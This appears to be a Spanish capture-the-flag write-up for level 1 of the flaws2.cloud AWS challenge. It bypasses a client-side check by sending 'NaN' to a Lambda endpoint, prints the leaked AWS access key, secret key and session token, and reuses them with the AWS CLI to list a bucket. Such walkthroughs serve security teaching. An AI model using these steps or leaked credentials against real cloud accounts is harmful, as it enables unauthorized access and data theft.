Level 1
Jugaremos solo el attacker PATH
Acceder a
https://level1.flaws2.cloud.s3.amazonaws.com/
Nos tira acceso denegado.
Esto también:
Parece que se está haciendo una validación del lado del cliente para evitar que enviaemos valores inválidos.
<script type="text/javascript">
function validateForm() {
var code = document.forms["myForm"]["code"].value;
if (!(!isNaN(parseFloat(code)) && isFinite(code))) {
alert("Code must be a number");
return false;
}
}
</script>
<form name="myForm" action="https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1" onsubmit="return validateForm()">
Code:
<input type="text" name="code" value="1234">
<br>
<br>
<input type="submit" value="Submit">
</form>
Vemos la petición que envía la página web:
Si probamos
curl https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1?code=NaN
Nos retorna
{
"LANG": "en_US.UTF-8",
"AWS_ACCESS_KEY_ID": "ASIAZQNB3KHGFP4V6JRD",
"AWS_LAMBDA_LOG_STREAM_NAME": "2025/11/02/[$LATEST]67f88fc759604d9bb887850d08f46405",
"AWS_XRAY_CONTEXT_MISSING": "LOG_ERROR",
"AWS_SESSION_TOKEN": "IQoJb3JpZ2luX2VjEH4aCXVzLWVhc3QtMSJGMEQCIDE0AltwqcYu1Ven34gCxN+b3IVU1Mdv7iLFr0zD078NAiAyMYL8Ay4mogxHyjdROKYanymmZ22rkzoeu2Z7eWDaAyrgAghGEAMaDDY1MzcxMTMzMTc4OCIMAHQMAoWSkw0TbLrgKr0C6Fddb2/OeOKClozP+hNSdFfI19ODcNNEBhL4BD9SBW6Xo/FpfUuioJfs/NKrCL038pqZ7Au+qJilgMtvxTr7FGeYfSlGW3fDEV0oQx4BeXBtkD/M/bnQf1xcX8/KCoODwaLGEGgTGZcoZFCHRTFlqef6ScAoyGf+7UZbHkMXTMsPaVTdrYLHsgIlg6+5KvURGY6prp2FyQfymI70Bf6buJmtcS0vTaOCgskYjU2Yt0X22Yrw9j3gj76trGyLKLT/9CxsDhUZU0KX5pbHW3RP4B/TVC4E67MumZDLLwRVbH5fz80FyXxtPG480SBkbGRXsnb8V4CJEVfU67dMN3hRdI5xFuENguQTw4eNoz5QVBhlCTArQWh9lGWzYro/Vhmuj8y/Laf1oiQs3qckyLL59bjA/2S5sIB+CGdPA5gw4LKdyAY6nwGOnlS9/z01fKHO+AyV67nf122wW48UE0zeEmmlRo4rhNOdMyy9KE2SDxg4ummT27/NIHTPdGLBHIMRbkL5rfOGZbuDKU+r+Olj8iF3xZAA4GtLDmsppH4zk21w2HPXT/ZVXv7heOVI1D6gBZZK3aUPXvJTHLuffH+aiQg+IhEDhWhV+xfAlfretNj1i41M6cq/yDPPpOIGuaz3YEguoa4=",
"AWS_LAMBDA_FUNCTION_VERSION": "$LATEST",
"AWS_EXECUTION_ENV": "AWS_Lambda_nodejs8.10",
"LD_LIBRARY_PATH": "/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib",
"_HANDLER": "index.handler",
"AWS_REGION": "us-east-1",
"TZ": ":UTC",
"AWS_XRAY_DAEMON_ADDRESS": "169.254.79.129:2000",
"AWS_SECRET_ACCESS_KEY": "wHXiDgRGGoGkHuphXtC3QNc/yoa5CzPKsphtIYSM",
"AWS_LAMBDA_LOG_GROUP_NAME": "/aws/lambda/level1",
"LAMBDA_RUNTIME_DIR": "/var/runtime",
"AWS_DEFAULT_REGION": "us-east-1",
"_AWS_XRAY_DAEMON_ADDRESS": "169.254.79.129",
"AWS_LAMBDA_INITIALIZATION_TYPE": "on-demand",
"PATH": "/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin",
"_AWS_XRAY_DAEMON_PORT": "2000",
"LAMBDA_TASK_ROOT": "/var/task",
"AWS_LAMBDA_FUNCTION_NAME": "level1",
"AWS_LAMBDA_FUNCTION_MEMORY_SIZE": "128",
"AWS_LAMBDA_RUNTIME_API": "127.0.0.1:9001",
"NODE_PATH": "/opt/nodejs/node8/node_modules:/opt/nodejs/node_modules:/var/runtime/node_modules:/var/runtime:/var/task:/var/runtime/node_modules",
"_X_AMZN_TRACE_ID": "Root=1-69075a0c-4a96038f09332194548ea86b;Parent=39951c357b226878;Sampled=0;Lineage=1:e547cb94:0"
}
Nos creamos un nuevo profile con esos datos
aws s3 ls s3://level1.flaws2.cloud
whoami
aws sts get-caller-identity --profile level1
Listamos el bucket
aws s3 ls s3://level1.flaws2.cloud --profile level1
http://level1.flaws2.cloud/secret-ppxVFdwV4DDtZm8vbQRvhxL8mE6wxNco.html